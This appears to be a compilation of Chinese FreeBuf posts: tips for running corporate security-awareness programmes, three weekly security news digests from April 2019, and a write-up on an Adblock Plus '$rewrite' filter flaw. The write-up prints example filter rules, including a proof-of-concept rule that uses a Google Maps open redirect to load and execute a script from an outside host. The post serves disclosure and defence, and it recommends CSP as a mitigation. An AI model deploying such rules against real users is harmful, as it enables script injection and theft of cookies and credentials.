诸如Microsoft Word和Unix等应用和操作系统为管理员提供了系统登录时发送消息的通道。管理员可以自定义消息推送以提醒用户要遵守哪些安全要求、推送最新的安全提示或传输任何可以强化安全能力的消息。不过要注意信息要保持简短且不要经常发送,如果信息很复杂或者持续推送会降低它对用户产生的印象,并且在部分国家和地区可能存在违反法律规定的风险。

“阻止的站点”页面

限制员工访问各类网站(包括社交媒体、搜索、购物等正规网站)或阻止访问被视为有风险的网站是一种企业内部常见的安全策略。不过要注意不要只使用Web屏蔽服务供应商提供的默认“阻止的站点”页面,只写一句“违反企业安全策略”。最好在页面上为被阻止的网站创建自定义消息,告知用户不能访问该网站的原因。用好“阻止的站点”,为员工提供额外内容供他们阅读或查看以及相关联系人的信息,这样可以创造一个很好的主动学习机会。

方法二、各种类型的会议

远程培训

如果企业规模比较大,将所有员工集中到一起进行培训不方便,可以开展在线视频培训,员工无需离开办公桌即可参与,一般适用于分享安全提示、进行问答等简单的安全培训活动。

与安全主管共进午餐

与安全管理人员一起举办午餐会是向特定受众传达关键信息的简单且有效的方式,从另外一个层面看,真人讨论也能提升员工的参与度。

行业专家现场培训

邀请外部行业专家(如执法部门或专业公司)进行现场演示,为观众提供与安全行业领袖和从业者互动的机会。邀请的行业专家可以通过讲故事分享真实的信息和经验,让整体内容更加有趣,更能吸引观众。

方法三、增加安全专家的出镜率

拍摄短视频

企业内部安全专家可以尝试拍摄一些针对特定主题来拍摄一些小视频,每次讲解一个问题并提供解决方法,清晰、有意识地传达消息,拉动员工与企业内部安全人员的距离。增强安全专家的出镜率有助于提升员工对专家的熟悉度,从而增加视频的点击率和未来线下会议的参与率。这些视频可以存放在内网主页的某个固定区域。

专门的沟通邮箱

企业可以在内部设置一个专门用于安全问题的邮箱,保持与员工的持续沟通渠道,提供必要的信息交流。该邮箱可用于解答安全问题或提供反馈。然后,邮箱的管理人员可以将问题与解答定时上传至企业内部的常见安全问题与解答页面。这种方式不用与人面对面进行交流,是一种低投入的互动形式,对于部分员工可能更有吸引力。

布置安全专家的工位

可以将安全专家的工位布置得更加开放,增加饮食供应和舒适的座椅等,从形式上鼓励员工坐下来与安全专家聊一聊,在舒适的环境中员工会更愿意发言并提出一些关键问题。除了被动接受员工的咨询外,也可以主动发送座谈的邀请。

写博客

写博客是一种增加长期关注者的方式,还能巩固安全专家在相关领域的权威性。写博客是建议不要特别高瞻远瞩,最好的方式就是“保持真实”,要有故事,有细节,增加员工的代入感,有助于建立长期联系,推进员工安全意识的培养。其次,博客篇幅不必很长,在讲清事情的前提下越短越好。

方法四、让员工多多参与

摄影比赛

企业可以通过一些并非很直接、接地气的活动从侧面推进员工安全意识的培养。比如举办摄影比赛,流程比较简单,用户体验也很友好,能够接触和吸引各个部门的员工。摄影比赛可以围绕安全主题设定比赛目标和规则,比如让员工提供能够表现安全的照片。让企业高管参与可以大大提升活动的影响力,也可以表现高管对于安全的重视程度。此外,此类活动的宣传力度要广要大,除了群发电子邮件这种公共方式之外,还可以通过管理层通道在开例会时进行重点强调。当然,奖品的好坏也直接决定了活动能够吸引到的人数和质量。

安全小站

安全小站的形式可以是一个公共的展示和互动区域,可以提供部分经过处理的数据图表让员工更直观地看到安全态势,如果能够提供模拟安全攻防的互动项目或者小游戏那就更好了,比如在看到勒索软件在电脑上肆虐时该如何进行适当的补救,高互动的形式能够让参与者更加投入来解决安全问题。

攻防竞赛

根据企业的自身情况,可在严格限定范围和手段的情况下开展一系列网络攻防竞赛。比如针对企业员工面临的主要网络风险——钓鱼邮件,开展竞赛。比赛可分为攻击者和防御者,攻击者对防御者进行网络钓鱼攻击,而防御者则要在处理海量的邮件是避免踩坑,成功次数最多的攻击者和踩坑最少的防御者均能获得企业的奖励。要注意竞赛的手段和分寸,明确与企业正常业务的边界。

将安全延伸到私人时间

可以让员工携带不再使用、准备丢弃的老旧设备到公司,由安全专家说明和指导如何抹去个人信息,消除丢弃或者转卖时造成的安全风险,以后在处理客户或者企业的数据时也该采取相同的行动。

方法五、正面激励

正面反馈员工的进步

当企业高级管理层看到员工在保障企业安全时做出的努力和成果时,可以通过颁发奖状、留下手写消息卡片、通过电子邮件发送感谢信、提供礼品卡来奖励这些员工,感谢他们的安全行为,加强员工在企业安全建设过程中的主观能动性。

建立积分规则

建立积分规则的目的是推行长期的奖励计划,该计划向员工授予可用于在企业内部商店或者外部供应商处购买商品的积分。这种持续的奖励系统能够不断激励员工,构建长期的安全意识,表达对员工感谢。

给与虚拟的勋章

如果企业的内部通信或者协作软件支持虚拟勋章或者自定义头像的话,可以给与积极参与企业安全建设的员工开通虚拟安全勋章。虽然这种形式并不能给员工带来任何实际的奖励,但是可以推动安全意识的发展。

与CEO共进午餐

员工与CEO或其他高级管理人员面对面相处的时间可能很少。企业可向员工提供与CEO或平时比较少见的管理层人员共进午餐的机会,以表明高层对于安全建设的重视。可以同时邀请数名员工共进午餐,不设置任何正式议程,员工可以提出问题并了解企业领导和其他情况。

提拔做得好的员工

业务负责人可以将在企业安全建设中表现好的员工提拔至安全运营领导者的角色,赋予业务流程中的更多的安全话语权并加强其领导力。企业可以将这一环节添加到KPI考核机制中的加分部分,在晋升评定中给与看得见的积极反馈,并在企业内部通报结果,为员工参与安全建设添加更多动力。

方法六、保持头脑清醒

安全日历

通过电子邮件、海报、内网消息或上文中提到的内网横幅等渠道定期推送的简短安全提示,通知目前流行的安全威胁和公司可能面临安全事件。并与公司内部的数字营销团队合作,通过点击率了解数字流量和员工的关注度。

梳理谈话要点

安全专家可以为管理人员一份备注清单,用于在团队会议中加强安全信息内容部分。安全建设的核心内容应当保持一致,但每位团队管理者都可以根据各自团队文化进行自定义。

假想练习

团队领导可以在内部会议期间提出一些安全威胁的假象情况,让大家一起讨论。通过倾听对话,团队领导可以判断团队是否理解他们在保护企业安全方面的责任,并且可以在他们识别问题时提供额外的帮助和培训。这种方法也是促进合作思维的好途径,使得员工在安全的群体环境中表达想法和落实行动。

参考资料

Gartner: A Few Ways to Improve Security Awareness on a Tight Budget

*本文作者:Freddy,转载请注明来自FreeBuf.COM

各位Buffer早上好,今天是 2019年4月26日星期五。今天的早餐铺内容主要有:安全漏洞可以让攻击者可以从高通芯片中恢复私钥;Facebook可能因数据滥用而面临50亿美元的FTC罚款;Oracle WebLogic爆出零日漏洞;攻击者滥用GitHub服务来托管网络钓鱼工具包;美日联合声明,网络攻击将被视为武装攻击。

Fully Loaded Breakfast Bagel-019.jpg

安全漏洞可以让攻击者可以从高通芯片中恢复私钥

该漏洞影响高通芯片(用于数亿台Android设备)QSEE模块处理内部数据的方式。QSEE是一个可信执行环境(TEE),类似于英特尔的SGX。去年3月,NCC集团的安全研究员Keegan Ryan发现,Qualcomm实施的ECDSA加密签名算法允许检索在高通处理器的QSEE安全区域内处理的数据。攻击者只要在目标Android设备上获得Root权限即可获取QSEE空间中的数据。

Ryan表示去年就通知高通关于这个严重漏洞的详细信息,高通于本月早些时候发布了固件补丁,这些补丁已经包含在Google的Android 2019年4月安全更新中。但是鉴于很多Android设备厂商在推送补丁时动作十分缓慢,大量的手机用户仍处于巨大的安全风险之中。[来源:zdnet]

Facebook可能因数据滥用而面临50亿美元的FTC罚款

联邦贸易委员会(FTC)对Facebook发起的长达一年的数据安全调查已接近尾声,Facebook可能面临高达50亿美元的罚款。这家社交媒体巨头在周三发布的2019年第一季度财报中表示,它正拨出30亿至50亿美元作为应急费用。

此前,美国参议员罗恩·怀登(Ron Wyden)在一封写给美国联邦贸易委员会(FTC)的信中表示,希望让Facebook首席执行官马克·扎克伯格对该社交网络在隐私问题上所犯的错误“承担个人责任” 。这位民主党立法者写道: “考虑到扎克伯格先生的欺骗性陈述,他对Facebook的个人控制,以及他在批准与共享用户数据相关的关键决策中的作用,FTC可以而且必须让扎克伯格亲自对这些持续的违规行为负责。” 怀登在周二致FTC的一封信中表示。“FTC还必须明确表明,如果发生任何未来的违规行为,将适用于Facebook公司和扎克伯格先生的重大处罚。”[来源:zdnet]

Oracle WebLogic爆出零日漏洞

该零日漏洞会影响所有启用wls9_async_response.war和wls-wsat.war组件的Weblogic版本,包括最新版本。攻击者可以利用此漏洞通过发送特制的HTTP请求,在未经授权的情况下远程执行命令。根据CNCERT/CC发布的CNTA-2019-0015公告,该漏洞会影响WebLogic 10.x和WebLogic 12.1.3版本。甲骨文尚未解决这一关键漏洞。安全专家建议禁用易受攻击的模块“wls9_async_response.war”和“wls-wsat.war”,或禁止在Oracle WebLogic安装中访问URL“/ _async / *”和“/ wls-wsat / *”。KnownSec 404团队的专家通过使用ZoomEye搜索引擎在线搜索易受攻击的实例,发现36,173次攻击尝试,其中大部分在美国和中国。[来源:securityaffairs]

攻击者滥用GitHub服务来托管网络钓鱼工具包

攻击者利用GitHub Pages服务绕过白名单和网络防御,就像“使用大型消费者云存储站点、社交网络和商务服务,如Dropbox、Google Drive、Paypal、Ebay和Facebook“,可以将他们的恶意活动融入合法的网络流量中。研究人员表示,自2019年4月19日起,GitHub封禁了所有被发现参与恶意活动的账户。

正如Proofpoint的研究团队所发现的那样,多个恶意攻击者使用github.io域作为各种恶意活动的一个环节,包括网络钓鱼攻击,这些攻击将受害者引导到GitHub服务上托管的登陆页面。[来源:securityaffairs]

美日联合声明,网络攻击将被视为武装攻击

据外媒报道,日本和美国一致认为,针对日本的网络攻击可以被视为两国安全条约中提及的武装攻击。日本外相河野太郎和防卫大臣岩屋毅在东京于美日联合安全咨询委员会上会见了美国国务卿迈克·蓬佩奥和代理国防部长帕特里克·沙纳罕。后发布的联合声明中提到,将会根据具体情况,通过磋商决定一次网络攻击能否被归为武装袭击。有专家指出,很难界定网络攻击的目标是为了找出电脑安全系统漏洞的反间谍活动,还是攻击整个电脑系统,使其陷入瘫痪状态。

网络攻击包括侵入个人或企业电脑以及更严重的对基础设施的攻击,例如电力公司和金融机构。会议还发布了以在太空和网络空间等防卫新领域强化合作为主要内容的联合文件。文件对太空、网络和有阻碍通信之虞的电磁波这些新领域迅速的技术进步表示关切,将三者定位为有必要采取应对的优先领域。双方还就恶意网络活动构成“进一步威胁”达成共识。[来源:E安全]

各位Buffer早上好,今天是2019年4月19日星期五。今天的早餐铺内容主要有:美国联邦通信委员会将以安全问题为由中国移动进入美国市场;伊朗网络间谍工具源代码在Telegram泄露;超过1亿JustDial用户的数据发生泄露;前Mozilla工程师爆料,谷歌一直在破坏火狐;全球首个AI协同及大数据安全领域国际标准有望明年出台;欧盟发布《AI网络安全政策发展框架》。

CARROUSEL_DEARBREAKFAST_1.jpg

美国联邦通信委员会将以安全问题为由中国移动进入美国市场

美国联邦通信委员会(FCC)将以安全问题为由阻止全球最大的移动公司——中国移动,进入美国市场。FCC主席Ajit Pai在今天的一份声明中表示:“中国移动在我国提供电信服务的申请会引发严重的国家安全和执法风险。”美国联邦通信委员会委员将于5月9日对阻止中国移动进入美国的提案进行投票,但鉴于该监管机构中60%都是共和党人,并且他们将作为一个统一的联盟进行投票,中国移动无法进入基本上是板上钉钉的事了。

中国移动希望FCC批准其成为美国的“共同运营商”,能够在美国和其他国家之间传输国际语音流量,并连接到美国电信网络。中国移动告诉联邦通信委员会它并不打算在美国提供自己的电话服务,只是将现有服务扩展到更多地方。[来源:theregister]

伊朗网络间谍工具源代码在Telegram泄露

自3月中旬以来,一个名叫Lab Dookhtegan的人在Telegram上陆续曝出了6个伊朗间谍工具的源代码。除了黑客工具之外,Dookhtegan还发布了一些似乎是来自APT34的一些黑客受害者的数据,这些数据主要包括通过网络钓鱼页面收集的用户名和密码信息。该泄密者声称参与了该组织的DNSpionage活动,但不能完全相信他,因为泄密者很可能是外国情报机构的成员试图隐藏他们的真实身份,同时泼脏水给伊朗。

一些网络安全专家已经确认了这些工具的真实性。Alphabet的网络安全部门Chronicle今天早些时候向外媒证实了这一点。[来源:theregister]

超过1亿JustDial用户的数据发生泄露

JustDial(JD)成立于20多年前,是印度历史最悠久、最领先的本地搜索引擎,允许用户快速查找相关产品和服务的供应商,它的一个数据库可通过其网站、移动应用程序或甚至通过调用其API来访问并获取其客户的个人身份信息。该消息已经经过多方验证。

泄露的数据包括JustDial用户的姓名、电子邮件、手机号码、地址、性别、出生日期、照片和职业信息。 该API漏洞至少从2015年开始就存在了,但目前尚不清楚是否有人滥用它来收集JustDial用户的个人信息。[来源:thehackernews]

前Mozilla工程师爆料,谷歌一直在破坏火狐

作为全球范围内使用最多的浏览器,谷歌Chrome浏览器可以说在浏览器市场有着地位举足轻重,但近日,火狐浏览器开发商Mozilla前员工在推特上爆料,为了让Chrome成功,谷歌采用了一些卑劣手段抢占市场。曾经在Mozilla的火狐团队工作八年的工程师Johnathan Nightingale在推特上表示,谷歌在开始Chrome浏览器研发之前,Mozilla一直是谷歌的最大合作伙伴,当Chrome迎来黄金期时,谷歌转而用卑劣的手段来提高Chrome浏览器的采用率,这同时也降低了火狐的用户数量。

这位工程师表示,由于谷歌的Gmail和Docs服务总会在火狐浏览器上遇到选择性性能问题和错误,所以谷歌旗下的网站将火狐浏览器标记为不兼容的浏览器,虽然谷歌多次表示都是意外错误并承诺修复,但最后都是不了了之。[来源:IT之家]

全球首个AI协同及大数据安全领域国际标准有望明年出台

联邦学习是一种新兴的AI基础技术,能在保护数据隐私、满足合法合规要求的前提下进行机器学习。换言之,联邦学习可以在不分享数据的前提下,分享从数据中获得的知识。因此,联邦学习有望成为下一代AI协同算法和协作网络的基础。据介绍,IEEE联邦学习标准项目是国际上首个针对AI协同技术框架订立标准的项目,由国际著名AI学者杨强教授领衔担任主席。该项目对数字信任、科技向善的培育意义深远,也将为AI行业的进一步发展开辟新的道路。

IEEE是目前全球最大的非营利性专业技术学会,其下设的标准协会是世界领先的标准制定机构,标准制定内容涵盖AI等前沿信息科技,以及通信、电力和能源等多个科技领域,对全球科技发展具有举足轻重的影响。目前,IEEE标准协会已经制定了900多个现行工业标准,包括众所周知的有线与无线网络通信标准等。[来源:科学网]

欧盟发布《AI网络安全政策发展框架》

欧盟网络信息安全局(EuropeanUnionAgencyforNetworkandInformationSecurity,ENISA)于2019年3月发布了题为《建立网络安全政策发展框架——自主代理的安全和隐私考虑》的报告,旨在为欧盟成员国提供一个安全和隐私政策发展提供框架,以应对日益普及的AI应用。

本报告强调了一些需要考虑的因素,例如未经授权的自主系统,劫持和滥用透明度和问责制,普遍性,存储和处理的不透明性,并给出了一系列影响未来欧盟政策倡议的建议,包括:欧盟委员会、欧盟相关机构以及公私营部门利益相关方应进一步促进和支持采用安全和隐私设计原则,作为自主代理和系统的启动、设计和实施的先决条件;欧盟委员会、欧盟相关机构、公私部门利益相关方应促进识别和交流最佳实践的合作方法,逐步提出一系列基线安全要求,然后转变为可广泛接受的技术规范和标准;欧盟委员会、欧盟相关机构、公私部门利益攸关方应通过建立适当的道德准则,进一步保障和支持关于促进和保护人权的现有举措。[来源:学术Plus]

国外安全专家Sebastian近日发现Adblock Plus、AdBlock和uBlocker浏览器扩展的广告拦截过滤器列表存在漏洞,攻击者可以利用该漏洞运行恶意代码,可窃取用户的cookie、登录凭据、进行页面重定向或其他恶意行为。受影响的扩展拥有超过1亿活跃用户,并且该功能可以轻松利用以攻击任何足够复杂的Web服务(如Google服务),而攻击很难检测并且可以在所有主流浏览器中实现。

Ad-Blocker

“$ rewrite”语法

一个广告屏蔽插件通常分为两个部分:插件本身和订阅列表。订阅列表包含对于各类恶意网址、广告或者插件的屏蔽信息,大多都支持正则表达式。而插件本身则在读取这些订阅列表后进行相应的操作,比如浏览器连接到列表中的网址或者阻止恶意广告和脚本。

举个例子,下方是热门的订阅过滤器EasyList的内容:

easylist

2018年,Adblock Plus 3.2发布时,添加了一个名为$ rewrite 新语法,允许列表维护者将与特定正则表达式匹配的Web请求替换为另一个URL。替换字符串必须是相对应的URL,不包含主机名,并且在重写时必须与原始请求位于同一域中。

举个例子,在订阅列表中添加以下过滤规则可将example.com/ad.gif的所有请求都替换为example.com/puppies.gif。因此,页面上的对应位置不会显示广告,而是更换为小狗照片。

||example.com/ad.gif$rewrite=/puppies.gif

由于重写的URL必须与原始URL位于同一源,并且必须是相对URL,因此以下$ rewrite 实例是无效的。

||example.com/ads.js$rewrite=https://evilsite.tk/bwahaha.js

在新增该语法之处,开发者考虑到了可能引发的安全隐患,所以当重写的对象为SCRIPTSUBDOCUMENTOBJECTOBJECT_SUBREQUEST时,该语法失效。

那么在这些限制的加持下,如何利用该语法运行恶意代码?

XMLHttpRequest和Fetch

当使用XMLHttpRequest或Fetch下载代码并执行时,可以利用此过滤器语法使用Web服务,同时允许请求任意来源并于服务器端开放重定向。这样的攻击难以检测,因为该扩展插件会定期更新过滤器列表,只要该列表的维护人员为恶意过滤器列表设置一个较短的过期时间,然后将其替换为没问题的过滤器列表。

要利用该漏洞需要满足以下条件:

  1. 页面必须使用XMLHttpRequest或Fetch加载JS字符串并执行返回的代码;

  2. 页面不能严格部署了CSP策略,或者在执行下载的代码之前不能验证最终请求URL;

  3. 获取代码的来源必须支持服务器端的重定向或者内容托管。

关键就是使用XMLHttpRequest或Fetch来下载脚本和打开重定向功能,使得攻击者能够从远程站点通过XMLHttpRequest读取脚本,而此时对于插件而言看起来仍是同一个来源。

比如访问量非常大的Google Maps站点就可以利用XMLHttpRequest加载脚本,因为它的搜索结果页面中包含一个开放重定向:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

根据上述规则,当用户访问www.google.com/maps/时,过滤规则将使用Google开放重定向来读取https://majestic-ramsons.herokuapp.com/的内容。

运行远程脚本

由于打开的重定向url位于同一个源或域中,允许读取字符串并将其作为JavaScript执行,导致警报:

远程脚本显示警报

风险与后续

虽然更改过滤器页表的方法有很多,这不是最严重的一个,但Sebastian担心别有用心的列表维护者会利用该漏洞发起难以检测的针对性攻击,比如2018年,一个不署名的列表维护者因为政治原因该写了某个订阅列表,导致大量声援抗议活动的工会网站在该广告屏蔽插件的作用下出现问题。

Sebastian向谷歌报告了该漏洞,但谷歌坚称开放重定向是他们一贯的立场:

Google已收到有关此漏洞的通知,但该报告已作为”预期行为“被关闭,因为他们认为潜在的安全问题仅存在于上述浏览器扩展中。

实际上该漏洞可以用于一系列供应链攻击,Sebastian建议网站使用CSP标头和connect-src选项来指定可以从中加载脚本的站点的白名单,以降低安全风险。

*参考来源:

各位Buffer早上好,今天是2019年4月12日星期五。今天的早餐铺内容主要有:研究人员披露WiFi WPA3标准中的“龙血”漏洞;25%的网络钓鱼攻击能够绕过Office 365内置的默认安全措施;IDC发布2019全球IT安全支出规模预测,中国增速惹眼;三分之二的酒店网站泄漏客人预订详情并允许访问个人数据;新版征信将上线,个人信息保护立法应跟进;北约合作网络防御卓越中心报告:华为、5G和安全威胁。

5-Resep-Sarapan-Pagi-Praktis-Untuk-Orang-Sibuk.jpg

研究人员披露WiFi WPA3标准中的“龙血”漏洞

“龙血”漏洞共有五个,包括拒绝服务攻击、两个降级攻击和两个侧通道信息泄露漏洞。拒绝服务攻击漏洞危害程度较低,只会导致使用WPA3的接入点崩溃,其他四个可用于获取用户密码。两个降级攻击和两个侧通道信息泄露漏洞都是WPA3标准的Dragonfly密钥交换中的设计缺陷引起,这是一种客户端在WPA3路由器或接入点上进行身份验证的机制。在研究人员发布漏洞信息后,WiFi联盟表示WPA3标准已经添加了安全更新,修复了“龙血”漏洞。[来源:zdnet]

25%的网络钓鱼攻击能够绕过Office 365内置的默认安全措施

数据来自Avanan的全球网络钓鱼报告,该报告分析了发送到Microsoft Office 365和Google G Suite帐户的5550万封电子邮件。发现大约有1%的邮件使用恶意附件或链接作为攻击媒介。其中,25%被Office 365中内置的Exchange Online Protection(EOP)标记为安全并交付给用户。

Avanan首席安全分析师兼报告作者Yoav Nathanie表示:基于云的电子邮件服务已经进入了一个全新的网络钓鱼时代。云电子邮件的连接特性允许攻击者通过单次成功的网络钓鱼攻击获得更大的利益,因为只要盗取用户凭据后可以让他们访问其他连接的帐户,例如云文件共享或云HR系统。[来源:darkreading]

IDC发布2019全球IT安全支出规模预测,中国增速惹眼

近日,IDC发布的IDC Worldwide Semiannual Security Spending Guide, 2018H1再次引起全球网络安全市场高度关注,根据IDC预测,2019年全球IT安全相关硬件、软件和服务支出将达到1031亿美元,相比2018年增长9.4%。随着全球各行业在安全解决方案上持续投入巨资以应对各种纷繁复杂的恶意威胁,满足各类安全需求,这种快速增长趋势将在未来几年仍将持续。IDC预测,在2018-2022年预测期内,全球安全解决方案支出将实现9.2%的年复合增长率(CAGR),预计2022年将达到1338亿美元。

IDC预测,2019年中国安全解决方案总体支出将达到69.5亿美元,2018-2022年预测期内的年复合增长率(CAGR)为25.6%,增速远高于全球平均水平,到2022年,市场规模将增长至137.7亿美元。2019年,安全硬件在中国整体安全支出中将继续占据绝对主导地位,占比高达61.9%;安全软件和安全服务支出比例分别为16.4%和21.7%。从行业上来看,政府、通信、金融仍将是中国网络安全市场前三大支出行业,占中国总体IT安全市场约六成的比例。[来源:IDC咨询]

三分之二的酒店网站泄漏客人预订详情并允许访问个人数据

赛门铁克首席安全研究人员Candid Wueest近日发文称,酒店网站可能会泄露客人的预订详情,允许其他人查看客人的个人数据,甚至取消他们的预订。在最近研究酒店网站上可能发生的劫持攻击时,Wueest偶然发现了一个可能泄漏客人个人数据的问题。

Wueest测试了多个网站 – 包括54个国家/地区的1500多家酒店 – 以确定这个隐私问题的常见程度。我发现这些网站中有三分之二(67%)无意中将预订参考代码泄露给第三方网站,如广告客户和分析公司。他们都有隐私政策,但他们都没有明确提到这种行为。虽然广告商跟踪用户的浏览习惯已经不是什么秘密,但在这种情况下,共享的信息可以允许这些第三方服务登录预订,查看个人详细信息,甚至完全取消预订。自从《通用数据保护条例》(GDPR)在欧洲生效以来已近一年了,但受此问题影响的许多酒店的遵守法规的速度非常缓慢。[来源:darkreading]

新版征信将上线,个人信息保护立法应跟进

据媒体报道,中国人民银行个人征信中心已试运行新版个人征信报告,将于近期正式上线。届时,对个人失信行为的约束将更严格。“拆东墙补西墙”、以卡养卡、发生严重违约后销户来“洗白”等不诚信行为将可能产生更严重的后果。

据介绍,新版个人征信报告与旧版相比有三大变化,一是信息更加完整细化。除旧版个人基本信息之外,新版个人征信报告将完整展示贷款人及配偶的相关信息。同时,职业信息也更完整,信息量与个人求职简历相当。更细化的信息,将使个人信用情况更为一目了然。二是信息更加全面丰富。原来的征信记录少量个人信息,房贷、银行卡等。除借贷等金融信息外,新版征信将纳入更广泛的信息,如电信业务、自来水业务缴费情况、欠税、民事裁决、强制执行、行政处罚、低保救助、执业资格和行政奖励等信息。同时还款记录由2年延长至5年,将记录详尽的还款信息、逾期信息;新增还款金额,逾期或透支额也将标注出来。三是信息更加及时精准。新版征信要求相关机构在采集数据的节点T+1日向征信中心报送最新的数据。征信信息由原来的一个月或者更久变成T+1日。此项规定,使得个人信用状况可以得到更加真实的反映,金融机构的信贷管理将变得更有针对性,风险管理更加精准,避免一些人利用信息采集的时间差来套取多家银行贷款,可有效降低信贷风险。[来源:证券时报]

北约合作网络防御卓越中心报告:华为、5G和安全威胁

(以下内容不代表本站观点)

4月1日,北约合作网络防御卓越中心(CCDCOE)发表一份研究报告《华为、5G和安全威胁》,探讨了华为作为下一代无线网络5G技术的潜在供应商所存在的网络安全问题。主要内容包括运用中国5G技术所引起的战略和法律问题,各国针对这一问题的反应,报告最后提出了4条建议。

报告认为在关键通信领域要求5G技术提供尽可能高的安全保证无可厚非。在追求技术创新的同时,对网络安全的关切将影响到更广泛的国家安全问题。关键网络如果丧失或中断可用性、完整性和保密性,将对社会产生重大不利影响。许多国家对中国通信技术公司与情报部门之间关系暧昧可能产生的后果表示担忧,而中国的政治和法律环境要求其与情报机构合作,则无疑强化了这层关系。因此,5G技术被认为是一种战略性选择,更甚于技术选择。

报告建议有必要寻求华为的替代技术,以防止陷入独家供应商的困境,从而保持选择的灵活性。在技术面前,严苛的问责、高透明度和风险缓解机制是最基本的保障,这样才能在不损害国家安全的情况下安享5G福祉。因此,加强研发投入和区域工业经济,已非应对全球竞争之策,而是缓解安全之虞。[来源:ccdcoe]